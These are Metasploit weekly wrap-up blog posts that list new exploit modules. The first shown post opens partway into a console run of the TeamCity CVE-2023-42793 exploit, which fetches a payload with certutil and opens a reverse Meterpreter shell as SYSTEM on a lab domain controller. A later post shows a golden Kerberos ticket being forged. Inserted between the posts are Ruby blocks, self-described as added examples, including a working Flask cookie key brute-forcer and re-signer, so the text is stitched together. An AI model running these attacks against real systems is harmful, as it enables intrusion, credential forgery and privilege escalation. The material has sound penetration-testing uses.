   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      cymQYMMk         no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.250.134  yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > exploit

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.05.3 (build 129390) detected.
[*] Token already exists, deleting and generating a new one.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.UUxBSk0zMGk1eWFzRGZRYjg3LWJqWVVrY1Fn.YjU0NmIwYjUtNTZmNC00N2U3LWI4MGItMDdhOTQ0YjIzZGQ5
[*] Modifying internal.properties to allow process creation...
[*] Waiting for configuration change to be applied...
[*] Executing payload...
[*] Resetting the internal.properties settings...
[*] Sending stage (200774 bytes) to 192.168.250.237
[*] Waiting for configuration change to be applied...
[*] Deleting the authentication token.
[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:65397) at 2023-09-28 13:29:20 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DC
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x64/windows
meterpreter >
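The automatic check in the run above reports the detected TeamCity version and build and decides vulnerability by comparing it against the first fixed release, 2023.05.4. The Ruby below is an added example, not code from the Metasploit module, that shows such a version-gated check written the way the how-to-write-a-check-method guidance describes: every path returns a check code, and nothing calls fail_with, so it can run as AutoCheck without aborting the module. Gem::Version stands in for Rex::Version, the CheckCode module is a stand-in for Exploit::CheckCode, the banner strings are constructed for the example, and fetch_banner is an assumed helper because the post does not say which page the real module reads the version from.

```ruby
require 'net/http'
require 'uri'
require 'rubygems' # Gem::Version, used here in place of Metasploit's Rex::Version

# Added example: a version-gated check for CVE-2023-42793, modelled on the
# "JetBrains TeamCity 2023.05.3 (build 129390) detected" line in the console
# output above. This is not the module's own code.

# First fixed release per the post: everything before 2023.05.4 is affected.
TEAMCITY_FIXED = Gem::Version.new('2023.05.4')

# Matches e.g. "JetBrains TeamCity 2023.05.3 (build 129390)".
TEAMCITY_BANNER = /TeamCity\s+(\d+(?:\.\d+)+)\s*\(build\s+(\d+)\)/

# Stand-in for Metasploit's Exploit::CheckCode so the example runs outside msfconsole.
module CheckCode
  Vulnerable = :vulnerable
  Safe       = :safe
  Unknown    = :unknown
end

# Pulls the version and build out of any text that carries the TeamCity banner.
# Returns nil when the banner is absent instead of raising.
def parse_teamcity_banner(text)
  m = TEAMCITY_BANNER.match(text.to_s)
  return nil unless m

  { version: Gem::Version.new(m[1]), build: m[2].to_i }
end

# The check method proper: every path returns [code, reason] and nothing calls
# fail_with, so a caller can run it as AutoCheck without aborting the module.
def check_teamcity(text)
  info = parse_teamcity_banner(text)
  return [CheckCode::Unknown, 'no TeamCity version banner found'] if info.nil?

  detail = "JetBrains TeamCity #{info[:version]} (build #{info[:build]}) detected"
  if info[:version] < TEAMCITY_FIXED
    [CheckCode::Vulnerable, detail]
  else
    [CheckCode::Safe, detail]
  end
end

# Assumed helper (not from the post): fetch the page that carries the banner.
# Which URL exposes it is not stated in the post, so the path is a parameter.
def fetch_banner(base_url, path = '/')
  Net::HTTP.get(URI.join(base_url, path))
end
```

Run it against a host with something like check_teamcity(fetch_banner('http://192.168.159.10:8111')); the return value is the [code, reason] pair rather than printed output, so the same function can back both a manual check and an AutoCheck run.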

New module content (2)

JetBrains TeamCity Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18408 contributed by sfewer-r7
Path: multi/http/jetbrains_teamcity_rce_cve_2023_42793

Description: This adds an unauthenticated RCE for JetBrains TeamCity server on both Linux and Windows. A remote attacker can exploit an authentication bypass vulnerability and then execute OS commands in the context of the service.

Microsoft Error Reporting Local Privilege Elevation Vulnerability

Authors: Filip Dragović (Wh04m1001), Octoberfest7, and bwatters-r7
Type: Exploit
Pull request: #18314 contributed by bwatters-r7
Path: windows/local/win_error_cve_2023_36874

Description: This adds an exploit module that leverages a directory traversal vulnerability in Windows 10. This vulnerability is identified as CVE-2023-36874 and enables an attacker to elevate privileges to those of the NT AUTHORITY\SYSTEM user. Note that this module works with Windows 10 x64 22H2.

Enhancements and features (1)

  • #18399 from h00die – Fixes multiple spelling mistakes in module documentation.


Metasploit Weekly Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2023/09/22/metasploit-weekly-wrap-up-28/

Improved Ticket Forging


Metasploit’s admin/kerberos/forge_ticket module has been updated to work with Server 2022. In Windows Server 2022, Microsoft started requiring additional new PAC elements to be present – the PAC requestor and PAC attributes. The newly forged tickets will have the necessary elements added automatically based on the user-provided domain SID and user RID. For example:

msf6 auxiliary(admin/kerberos/forge_ticket) > run aes_key=4a52b73cf37ba06cf693c40f352e2f4d2002ef61f6031f64924fb50be1e23978 domain_sid=S-1-5-21-1242350107-3695253863-3717863007 USER_RID=500 domain=demo.local user=Administrator action=FORGE_GOLDEN

[*] TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230915213733_default_unknown_mit.kerberos.cca_219182.bin
[*] Primary Principal: [email protected]
Ccache version: 4

....
            Pac Requestor:
              SID: S-1-5-21-1242350107-3695253863-3717863007-500
            Pac Attributes:
              Flag length: 2
              Flags: 1
                .... .... .... .... .... .... .... ..0. Pac Was Requested: The PAC_WAS_REQUESTED bit is NOT SET
                .... .... .... .... .... .... .... ...1 Pac Was Given Implicitly: The PAC_WAS_GIVEN_IMPLICITLY bit is SET
            Pac Server Checksum:
              Signature: 1f94f52598b37bb9cf7e3995
            Pac Privilege Server Checksum:
              Signature: 79ec20b7d4b8e77e5c056563

The domain SID and user RIDs can be obtained using the auxiliary/gather/ldap_query module with the ENUM_DOMAIN and ENUM_ACCOUNTS actions.

New module content (5)

Apache Airflow 1.10.10 – Example DAG Remote Code Execution

Authors: Ismail E. Dawoodjee, Pepe Berba, and xuxiang
Type: Exploit
Pull request: #18283 contributed by ismaildawoodjee
Path: linux/http/apache_airflow_dag_rce

Description: This module exploits an unauthenticated command injection vulnerability by combining two critical vulnerabilities in Apache Airflow 1.10.10. The first, CVE-2020-11978, is an authenticated command injection vulnerability found in one of Airflow’s example DAGs, example_trigger_target_dag, which allows any authenticated user to run arbitrary OS commands as the user running Airflow Worker/Scheduler. The second, CVE-2020-13927, is a default setting of Airflow 1.10.10 that allows unauthenticated access to Airflow’s Experimental REST API to perform malicious actions such as creating the vulnerable DAG above.

Lexmark Device Embedded Web Server RCE

Authors: James Horseman, Zach Hanley, and jheysel-r7
Type: Exploit
Pull request: #18333 contributed by jheysel-r7
Path: linux/http/lexmark_faxtrace_settings

Description: This adds an exploit module that leverages an unauthenticated remote code execution vulnerability in certain Lexmark devices through 2023-02-19. This vulnerability (CVE-2023-26068) is only exposed if, when setting up the printer or device, the user selects "Set up Later" when asked if they would like to add an Admin user.

TOTOLINK Wireless Routers unauthenticated remote command execution vulnerability

Authors: Kazamayc (https://github.com/Kazamayc) and h00die-gr3y
Type: Exploit
Pull request: #18365 contributed by h00die-gr3y
Path: linux/http/totolink_unauth_rce_cve_2023_30013

Description: This adds an exploit module that leverages a command injection vulnerability in TOTOLINK X5000R Wireless Gigabit Router firmware X5000R_V9.1.0u.6118_B20201102. This allows remote code execution as the user running the web server, which is typically root.

Ivanti Avalanche MDM Buffer Overflow

Authors: A researcher at Tenable and Ege BALCI
Type: Exploit
Pull request: #18321 contributed by EgeBalci
Path: windows/misc/ivanti_avalanche_mdm_bof

Description: This PR adds an exploit module that targets Ivanti Avalanche MDM versions before v6.4.1, leveraging a buffer overflow condition.

Unix Command Shell, Reverse TCP (via socat)

Author: jheysel-r7
Type: Payload (Single)
Pull request: #18333 contributed by jheysel-r7
Path: cmd/unix/reverse_socat_tcp

Description: This adds a single (stageless) Unix command shell payload that connects back over TCP using socat. It was added in the same pull request as the Lexmark linux/http/lexmark_faxtrace_settings exploit module above.

Enhancements and features (5)

  • #18294 from zgoldman-r7 – Improves the error messages shown when Metasploit fails to interact with a network interface, such as when calling set LHOST.
  • #18358 from zeroSteiner – This adds a new ThriftClient class for interacting with Thrift RPC services. It also updates the two existing Metasploit modules to use it.
  • #18361 from cgranleese-r7 – Updates the search command with the additional search keywords stage:, stager: and adapter:.
  • #18374 from h00die – Fixes a bug in 7 modules which specified the RelatedModules metadata incorrectly. Now the RelatedModules data is correctly shown to the user when running the info command.
  • #18377 from ErikWynter – This change adds a check to the auxiliary/scanner/smtp/smtp_relay scanner module to confirm whether the EHLO command is supported by the server. If not, the module will try to initiate the session using the HELO command instead.

Bugs fixed (4)

  • #18359 from smashery – Updates the admin/kerberos/forge_ticket module to work with newer Windows Server releases, in particular post Windows Server October 2022. Now, when forging Golden tickets, the forged PAC contains a PAC requestor element with the forged user SID, and additional PAC attributes.
  • #18369 from adfoster-r7 – This PR fixes a crash with OptAddressLocal that was caused by darwin AF_LINK having an empty string for its addr.
  • #18370 from adfoster-r7 – This PR fixes an issue where msfrpc would hang when updating saved command history.
  • #18378 from adfoster-r7 – Removes remaining debug logging from the Prometheus Exporter.


Metasploit Weekly Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2023/09/15/metasploit-weekly-wrap-up-27/

Flask Cookies


This week includes two modules related to Flask cookie signatures. One is specific to Apache Superset, where session cookies can be re-signed, allowing an attacker to elevate their privileges and dump the database connection strings. While adding this functionality, community member h00die also added a module for generically working with the default session cookies used by Flask. This generic module, auxiliary/gather/python_flask_cookie_signer, allows for brute-forcing common signing keys from a wordlist as well as decoding cookies and re-signing them if the key is known (or recovered).
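Both modules rely on the same fact: a default Flask session cookie is a signed, not encrypted, blob, so anyone holding SECRET_KEY can rewrite the claims. The Ruby below is an added example, not the python_flask_cookie_signer module's code, that implements the default Flask session format (itsdangerous' URLSafeTimedSerializer) far enough to decode a cookie, verify or brute-force its signing key from a wordlist, and re-sign it with changed claims. It assumes an unmodified Flask session interface: salt "cookie-session", HMAC key derivation, SHA-1, compact JSON payloads. The secret, session contents and wordlist in the test are constructed for the example.

```ruby
require 'json'
require 'openssl'
require 'zlib'

# Added example, not the python_flask_cookie_signer module's code: decode,
# verify, brute-force and re-sign default Flask session cookies.
# Assumed defaults: salt "cookie-session", key_derivation "hmac", SHA-1.
FLASK_SALT = 'cookie-session'.freeze
SEP = '.'.freeze

# base64url without padding, as itsdangerous emits it.
def b64url_encode(raw)
  [raw].pack('m0').tr('+/', '-_').delete('=')
end

def b64url_decode(str)
  s = str.tr('-_', '+/')
  (s + '=' * ((4 - s.length % 4) % 4)).unpack1('m0')
end

# key_derivation="hmac": the per-purpose key is HMAC-SHA1(secret, salt).
def derive_key(secret)
  OpenSSL::HMAC.digest('SHA1', secret, FLASK_SALT)
end

def signature_for(secret, signed_value)
  b64url_encode(OpenSSL::HMAC.digest('SHA1', derive_key(secret), signed_value))
end

# Timestamps are minimal big-endian integers, base64url-encoded.
def encode_timestamp(ts)
  hex = ts.to_s(16)
  hex = '0' + hex if hex.length.odd?
  b64url_encode([hex].pack('H*'))
end

def decode_timestamp(str)
  b64url_decode(str).unpack1('H*').to_i(16)
end

# Payload: compact JSON, zlib-compressed and prefixed with "." when that is shorter.
def encode_payload(session)
  json = JSON.generate(session)
  deflated = Zlib::Deflate.deflate(json)
  return SEP + b64url_encode(deflated) if deflated.bytesize < json.bytesize - 1

  b64url_encode(json)
end

def decode_payload(payload)
  raw = if payload.start_with?(SEP)
          Zlib::Inflate.inflate(b64url_decode(payload[1..]))
        else
          b64url_decode(payload)
        end
  JSON.parse(raw.force_encoding('UTF-8'))
end

def sign_session(secret, session, timestamp: Time.now.to_i)
  signed_value = encode_payload(session) + SEP + encode_timestamp(timestamp)
  signed_value + SEP + signature_for(secret, signed_value)
end

# Session hash if the cookie verifies under +secret+, otherwise nil.
# A plain comparison is fine here: this is the attacker's side, not a server.
def verify_session(secret, cookie)
  signed_value, sep, sig = cookie.rpartition(SEP)
  return nil if sep.empty? || signature_for(secret, signed_value) != sig

  decode_payload(signed_value.rpartition(SEP)[0])
end

# Claims without any signature check (what a "decode" action does).
def decode_session(cookie)
  decode_payload(cookie.rpartition(SEP)[0].rpartition(SEP)[0])
end

# Wordlist attack on SECRET_KEY; returns the first candidate that verifies, or nil.
def brute_force_key(cookie, candidates)
  candidates.find { |key| !verify_session(key, cookie).nil? }
end

# Re-sign with modified claims once the key is known or recovered.
def resign_session(secret, cookie, changes)
  sign_session(secret, decode_session(cookie).merge(changes))
end
```

The brute force is cheap because each candidate costs two SHA-1 HMACs and no network round trip, which is why weak or default SECRET_KEY values turn a "signed" cookie into a writable one.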

New module content (12)

Apache Superset Signed Cookie Priv Esc

Authors: Naveen Sunkavally, Spencer McIntyre, h00die, and paradoxis
Type: Auxiliary
Pull request: #18180 contributed by h00die
Path: auxiliary/gather/apache_superset_cookie_sig_priv_esc
AttackerKB reference: CVE-2023-27524

Description: This adds two modules for targeting vulnerabilities related to the signing of Flask’s session cookies. One of them exploits a vulnerability in Apache Superset which is identified as CVE-2023-27524.

Prometheus API Information Gather

Author: h00die
Type: Auxiliary
Pull request: #18290 contributed by h00die
Path: auxiliary/gather/prometheus_api_gather

Description: This PR creates two modules: one to interrogate Prometheus API endpoints for information and one to query Prometheus Node Exporters for information. This is supported by a new Prometheus library and specs.

Prometheus Node Exporter And Windows Exporter Information Gather

Author: h00die
Type: Auxiliary
Pull request: #18290 contributed by h00die
Path: auxiliary/gather/prometheus_node_exporter_gather

Description: This PR creates two modules: one to interrogate Prometheus API endpoints for information, the other to query Prometheus Node Exporters for information. This is supported by a new Prometheus library and specs.

Python Flask Cookie Signer

Authors: Spencer McIntyre, h00die, and paradoxis
Type: Auxiliary
Pull request: #18180 contributed by h00die
Path: auxiliary/gather/python_flask_cookie_signer

Description: This is the generic half of the two Flask cookie modules added in this release. It brute-forces the signing key from a wordlist, decodes cookies, and re-signs them when the key is known or recovered; the Apache Superset module above applies the same technique to CVE-2023-27524.

Ivanti Sentry MICSLogService Auth Bypass resulting in RCE (CVE-2023-38035)

Authors: James Horseman, Zach Hanley, and jheysel-r7
Type: Exploit
Pull request: #18330 contributed by jheysel-r7
Path: exploits/linux/http/ivanti_sentry_misc_log_service
AttackerKB reference: CVE-2023-38035

Description: This PR adds an exploit module that targets Ivanti Sentry (formerly MobileIron Sentry). Ivanti Sentry is vulnerable to an authentication bypass that exposes API functionality, allowing for code execution in the context of the root user.

Kibana Timelion Prototype Pollution RCE

Authors: Gaetan Ferry, Michał Bentkowski, and h00die
Type: Exploit
Pull request: #18316 contributed by h00die
Path: exploits/linux/http/kibana_timelion_prototype_pollution_rce
AttackerKB reference: CVE-2019-7609

Description: Adds a module that exploits a prototype pollution vulnerability in the Kibana Timelion visualiser resulting in Remote Code Execution.

OpenTSDB 2.4.1 unauthenticated command injection

Authors: Daniel Abeles, Erik Wynter, and Gal Goldstein
Type: Exploit
Pull request: #18350 contributed by ErikWynter
Path: exploits/linux/http/opentsdb_key_cmd_injection
AttackerKB reference: CVE-2023-25826

Description: Adds a new module that exploits an unauthenticated command injection vulnerability in OpenTSDB through 2.4.1 resulting in root access.

VMware vRealize Log Insight Unauthenticated RCE

Authors: Ege BALCI and Horizon3.ai Attack Team
Type: Exploit
Pull request: #18273 contributed by EgeBalci
Path: exploits/linux/http/vmware_vrli_rce
ZDI reference: ZDI-23-115

Description: This adds an exploit for VMware vRealize Log Insight versions prior to 8.10.2. It chains multiple vulnerabilities (CVE-2022-31706, CVE-2022-31704, CVE-2022-31711) together to achieve unauthenticated RCE.

Sonicwall

Authors: Ron Bowes and fulmetalpackets
Type: Exploit
Pull request: #18302 contributed by rbowes-r7
Path: exploits/multi/http/sonicwall_shell_injection_cve_2023_34124
AttackerKB reference: CVE-2023-34127

Description: This adds an exploit module that leverages a remote code execution in SonicWall GMS. Version 9.3.9320 (and likely earlier) is affected by this vulnerability identified as CVE-2023-34124.

WinRAR CVE-2023-38831 Exploit

Author: Alexander "xaitax" Hagenah
Type: Exploit
Pull request: #18341 contributed by xaitax
Path: exploits/windows/fileformat/winrar_cve_2023_38831
AttackerKB reference: CVE-2023-38831

Description: This PR adds a module covering CVE-2023-38831, a file-format vulnerability affecting WinRAR 6.22.

LG Simple Editor Remote Code Execution

Authors: Ege Balcı and rgod
Type: Exploit
Pull request: #18329 contributed by EgeBalci
Path: exploits/windows/http/lg_simple_editor_rce
ZDI reference: ZDI-23-1204

Description: This module exploits broken access control and directory traversal vulnerabilities to achieve unauthenticated remote code execution on LG Simple Editor versions 3.21 and earlier. The module achieves code execution in the context of NT AUTHORITY\SYSTEM by uploading and executing a JSP payload.

Windows Common Log File System Driver (clfs.sys) Elevation of Privilege Vulnerability

Authors: Esteban.kazimirow, Ricardo Narvaja, and jheysel-r7
Type: Exploit
Pull request: #18250 contributed by jheysel-r7
Path: exploits/windows/local/cve_2023_28252_clfs_driver
AttackerKB reference: CVE-2023-28252

Description: Adds a new privilege escalation module that exploits a vulnerable clfs.sys driver on Windows to spawn a new NT AUTHORITY\SYSTEM Meterpreter session. The vulnerable driver comes installed by default on Windows 10 21H2, Windows 11 21H2 and Windows Server 2022 (Build 20348) operating systems.

Enhancements and features (8)

  • #17474 from prabhatjoshi321 – This PR adds support to the Capcom.sys driver LPE for Windows 11 21H1.
  • #18262 from cgranleese-r7 – Adds the ability to select favorite modules with the use command after running show favorites, similar to the search command.
  • #18270 from pbarry25 – Improves tab completion for the set and unset commands.
  • #18327 from h00die – Fixes an issue where specifying a TLS version in the ssl_version module would result in a NoMethodError.
  • #18349 from adfoster-r7 – Adds Meterpreter compatibility matrix generation to GitHub’s acceptance test runs. Now it’s possible to visually see which Meterpreters support particular functionality.
  • #18354 from zeroSteiner – This PR moves the MSF tip to be displayed while Metasploit is loading. This is similar to what a lot of video games do (e.g. Skyrim).
  • #18356 from adfoster-r7 – This PR updates the Docker Golang version.
  • #18357 from adfoster-r7 – Adds additional error reporting to the Meterpreter integration tests.

Bugs fixed (2)

  • #17970 from YiDa858 – Fixes an error in nessus_db_import and nessus_scan_export commands that prevented them from completing successfully.
  • #18362 from adfoster-r7 – Fixes an edge case which could cause a new msfrpc console instance to hang forever.


Metasploit Weekly Wrap-Up

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2023/09/08/metasploit-weekly-wrap-up-26/

New module content (4)

Roundcube TimeZone Authenticated File Disclosure


Authors: joel, stonepresto, and thomascube
Type: Auxiliary
Pull request: #18286 contributed by cudalac
Path: auxiliary/gather/roundcube_auth_file_read
AttackerKB reference: CVE-2017-16651

Description: This PR adds a module to retrieve an arbitrary file from hosts running Roundcube versions 1.1.0 through 1.3.2.

Elasticsearch Memory Disclosure

Authors: Eric Howard, R0NY, and h00die
Type: Auxiliary
Pull request: #18322 contributed by h00die
Path: auxiliary/scanner/http/elasticsearch_memory_disclosure
AttackerKB reference: CVE-2021-22145

Description: Adds an aux scanner module which exploits a memory disclosure vulnerability within Elasticsearch 7.10.0 to 7.13.3 (inclusive) by submitting a malformed query that generates an error message containing previously used portions of a data buffer. The disclosed memory could contain sensitive information such as Elasticsearch documents or authentication details.

QueueJumper – MSMQ RCE Check

Authors: Bastian Kanbach, Haifei Li, and Wayne Low
Type: Auxiliary
Pull request: #18281 contributed by bka-dev
Path: auxiliary/scanner/msmq/cve_2023_21554_queuejumper
AttackerKB reference: CVE-2023-21554

Description: This PR adds a module that detects Windows hosts that are vulnerable to Microsoft Message Queuing Remote Code Execution aka QueueJumper.

SolarView Compact unauthenticated remote command execution vulnerability

Author: h00die-gr3y
Type: Exploit
Pull request: #18313 contributed by h00die-gr3y
Path: exploits/linux/http/solarview_unauth_rce_cve_2023_23333
AttackerKB reference: CVE-2023-23333

Description: This PR adds a module which exploits a vulnerability that allows remote code execution on a vulnerable SolarView Compact device by bypassing internal restrictions through the vulnerable endpoint downloader.php using the file parameter. Firmware versions up to v6.33 are vulnerable.

Enhancements and features (2)

  • #18179 from jvoisin – This improves the windows checkvm post module by adding new techniques to identify the hypervisor in which the session is running.
  • #18190 from jvoisin – This improves the linux checkvm post module by adding new techniques to identify the hypervisor in which the session is running.


Metasploit Weekly Wrap-Up

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/09/01/metasploit-weekly-wrap-up-25/

Pumpkin Spice Modules


Here in the northern hemisphere, fall is on the way: leaves changing, the air growing crisp and cool, and some hackers changing the flavor of their caffeine. This release features a new exploit module targeting Apache NiFi as well as a new and improved library to interact with it.

New module content (1)

Apache NiFi H2 Connection String Remote Code Execution

Authors: Matei "Mal" Badanoiu and h00die
Type: Exploit
Pull request: #18257 contributed by h00die
Path: exploits/linux/http/apache_nifi_h2_rce
AttackerKB reference: CVE-2023-34468

Description: This adds an exploit module for an Apache NiFi H2 remote code execution identified as CVE-2023-34468. Versions 0.0.2 through 1.21.0 are vulnerable and allow an authenticated and authorized user to configure a Database URL with the H2 driver that enables custom code execution. This also adds a library with helper functions for modules targeting this product.

Enhanced Modules

Modules which have either been enhanced, or renamed:

Elasticsearch Enumeration Utility

Authors: Silas Cutler and h00die
Type: Auxiliary
Pull request: #18310 contributed by h00die
Path: auxiliary/gather/elasticsearch_enum

Description: This updates the Elasticsearch auxiliary module. It has been renamed to auxiliary/gather/elasticsearch_enum, accepts credentials, and stores the data pulled from the target to disk.

  • #18247 from EgeBalci – This adds an exploit module that leverages an authentication bypass and an arbitrary file upload in Netgear ProSAFE NMS300. These vulnerabilities have been identified as CVE-2023-38096 and CVE-2023-38098 respectively and affect versions below 1.7.0.22. By chaining together these vulnerabilities, an unauthenticated remote attacker can execute arbitrary code with SYSTEM privileges.

Enhancements and features (1)

  • #18309 from zeroSteiner – This updates the ldap_query module to stream the results instead of collecting them all at once. This should improve the UX of using the module in large target environments with 10s of thousands of accounts and the like.


Metasploit Weekly Wrap-Up

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/08/25/metasploit-weekly-wrap-up-24/

Power[shell]Point


This week’s new features and improvements start with two new exploit modules, leveraging CVE-2023-34960 in Chamilo versions 1.11.18 and below and CVE-2023-26469 in Jorani 1.0.0. Like CVE-2023-34960, I too, feel attacked by PowerPoint sometimes.
We also have several improvements, including additions to fetch payloads, PostgreSQL authentication, and documentation.

New module content (2)

Chamilo unauthenticated command injection in PowerPoint upload

Authors: Randorisec and h00die-gr3y
Type: Exploit
Pull request: #18233 contributed by h00die-gr3y
Path: exploits/linux/http/chamilo_unauth_rce_cve_2023_34960
AttackerKB reference: CVE-2023-34960

Description: This adds an exploit module that leverages an unauthenticated remote command execution vulnerability in Chamilo versions 1.11.18 and below. This vulnerability is identified as CVE-2023-34960. Due to a feature called Chamilo Rapid, which converts PowerPoint slides into courses, it is possible for an unauthenticated remote attacker to execute arbitrary OS commands using a malicious SOAP request to the vulnerable endpoint /main/webservices/additional_webservices.php.

Jorani unauthenticated Remote Code Execution

Author: RIOUX Guilhem (jrjgjk)
Type: Exploit
Pull request: #18123 contributed by Guilhem7
Path: exploits/multi/php/jorani_path_trav
AttackerKB reference: CVE-2023-26469

Description: This PR adds a module that chains together a log poisoning LFI redirection bypass and a path traversal vulnerability to obtain unauthenticated RCE.

Enhancements and features (4)

  • #18214 from bwatters-r7 – This makes two improvements to the fetch payloads. The first improvement is that the FETCH_SRVHOST option will be set to LHOST when LHOST is set and FETCH_SRVHOST is not, meaning there is now one less option users need to set when using a payload with a reverse stager. The second improvement is that the default command for the Windows HTTP payload has been changed to CERTUTIL which will offer better compatibility with older versions of Windows than the previous CURL command. The HTTPS and TFTP payloads will still default to CURL.
  • #18276 from adfoster-r7 – Updates all PostgreSQL modules to support the newer SCRAM-SHA-256 SASL authentication mechanism that pen testers are now seeing more frequently in the wild. This includes the modules for PostgreSQL authentication brute force, version fingerprinting, running queries, etc.
  • #18307 from ismaildawoodjee – This fixes documentation typos with the exploit/multi/http/subrion_cms_file_upload_rce module.
  • #18308 from ismaildawoodjee – Improves the readability of documentation/modules/exploit/windows/http/smartermail_rce.
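SCRAM-SHA-256 is worth understanding for anyone brute-forcing PostgreSQL logins, because the exchange never sends the password and the server can prove itself to the client as well. The Ruby below is an added example, not Metasploit's PostgreSQL library code, that implements the exchange (RFC 7677 on top of RFC 5802) with both the client and the server side so the client proof and the server signature can be checked end to end. It assumes the password is already SASLprep'd, no channel binding (the "n,," GS2 header, hence c=biws), and PostgreSQL's rolpassword verifier layout "SCRAM-SHA-256$<iter>:<salt>$<StoredKey>:<ServerKey>". The salt, password and nonces in the test are constructed for the example.

```ruby
require 'openssl'
require 'securerandom'

# Added example (not Metasploit's PostgreSQL library): a minimal SCRAM-SHA-256
# client and server, as PostgreSQL speaks it. Assumes a SASLprep'd password and
# no channel binding ("n,," GS2 header, so the c= attribute is always "biws").

def b64(raw)
  [raw].pack('m0')
end

def unb64(str)
  str.unpack1('m0')
end

def hmac256(key, data)
  OpenSSL::HMAC.digest('SHA256', key, data)
end

def sha256(data)
  OpenSSL::Digest::SHA256.digest(data)
end

def xor_bytes(a, b)
  a.bytes.zip(b.bytes).map { |x, y| x ^ y }.pack('C*')
end

# SaltedPassword -> ClientKey / StoredKey / ServerKey (RFC 5802 section 3).
def scram_keys(password, salt, iterations)
  salted = OpenSSL::PKCS5.pbkdf2_hmac(password, salt, iterations, 32, OpenSSL::Digest.new('SHA256'))
  client_key = hmac256(salted, 'Client Key')
  { client_key: client_key, stored_key: sha256(client_key), server_key: hmac256(salted, 'Server Key') }
end

# The verifier PostgreSQL keeps in pg_authid.rolpassword for a SCRAM role.
def pg_scram_verifier(password, salt, iterations = 4096)
  k = scram_keys(password, salt, iterations)
  "SCRAM-SHA-256$#{iterations}:#{b64(salt)}$#{b64(k[:stored_key])}:#{b64(k[:server_key])}"
end

class ScramClient
  attr_reader :client_first

  def initialize(user, password, nonce: b64(SecureRandom.random_bytes(18)))
    @password = password
    @nonce = nonce
    # libpq sends an empty n= and lets the startup packet carry the user name;
    # the user is included here only to keep the message shape visible.
    @client_first_bare = "n=#{user},r=#{nonce}"
    @client_first = "n,,#{@client_first_bare}"
  end

  def client_final(server_first)
    f = server_first.split(',').to_h { |kv| kv.split('=', 2) }
    raise 'server nonce must extend the client nonce' unless f['r'].start_with?(@nonce)

    keys = scram_keys(@password, unb64(f['s']), f['i'].to_i)
    without_proof = "c=biws,r=#{f['r']}"
    auth_message = [@client_first_bare, server_first, without_proof].join(',')
    proof = xor_bytes(keys[:client_key], hmac256(keys[:stored_key], auth_message))
    @expected_server_final = "v=#{b64(hmac256(keys[:server_key], auth_message))}"
    "#{without_proof},p=#{b64(proof)}"
  end

  # Mutual authentication: the server must prove it holds ServerKey.
  def server_final_ok?(server_final)
    server_final == @expected_server_final
  end
end

class ScramServer
  def initialize(verifier, nonce: b64(SecureRandom.random_bytes(18)))
    _mech, params, keys = verifier.split('$')
    @iterations, @salt_b64 = params.split(':')
    @stored_key, @server_key = keys.split(':').map { |k| unb64(k) }
    @nonce = nonce
  end

  def server_first(client_first)
    @client_first_bare = client_first.sub(/\An,,/, '')
    @combined_nonce = @client_first_bare[/(?:\A|,)r=([^,]+)/, 1] + @nonce
    @server_first = "r=#{@combined_nonce},s=#{@salt_b64},i=#{@iterations}"
  end

  # Returns the server-final message, or nil when the client proof is wrong.
  def server_final(client_final)
    without_proof, sep, proof_b64 = client_final.rpartition(',p=')
    return nil if sep.empty? || without_proof != "c=biws,r=#{@combined_nonce}"

    auth_message = [@client_first_bare, @server_first, without_proof].join(',')
    client_key = xor_bytes(unb64(proof_b64), hmac256(@stored_key, auth_message))
    return nil unless sha256(client_key) == @stored_key

    "v=#{b64(hmac256(@server_key, auth_message))}"
  end
end
```

The cost that matters for a login scanner is the PBKDF2 step: every guess costs the client the full iteration count (4096 by default) before it can even send a proof, so SCRAM brute force is bounded by the attacker's CPU rather than by the network.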

Bugs fixed (5)

  • #18272 from sfewer-r7 – This fixes an issue in the exploit module multi/http/adobe_coldfusion_rce_cve_2023_26360 when the target ColdFusion server is deployed with a Development profile.
  • #18287 from zeroSteiner – This fixes a stack trace thrown by the forge_ticket module when the SPN datastore option was left blank. The module now fails due to bad-config and gives a detailed error message.
  • #18297 from adfoster-r7 – This fixes the broken scanner/mysql/mysql_authbypass_hashdump module and adds documentation for the module.
  • #18298 from adfoster-r7 – Changes the behavior of setting LHOST to an interface name, for example with set LHOST eth0. Previously, a non-deterministic IP would be resolved from the adapter name if the adapter had multiple IPv4/IPv6 addresses registered. Now the lowest-ordinal IPv4 address is preferred first, followed by any IPv6 addresses.
  • #18306 from zeroSteiner – Fixes a crash when parsing ThriftHeader binary data.


Metasploit Weekly Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2023/08/18/metasploit-weekly-wrap-up-23/

Meterpreter Testing


This week’s release adds new payload tests to our automated test suite. This is intended to help the team and community members identify issues and behavior discrepancies before changes are made. Payloads run on a variety of different platforms including Windows, Linux, and OS X each of which has multiple Meterpreter implementations available that are now tested to help ensure consistency. This should improve payload stability and make testing easier for community members that are contributing new features to the payloads.

New module content (4)

H2 Web Interface Create Alias RCE

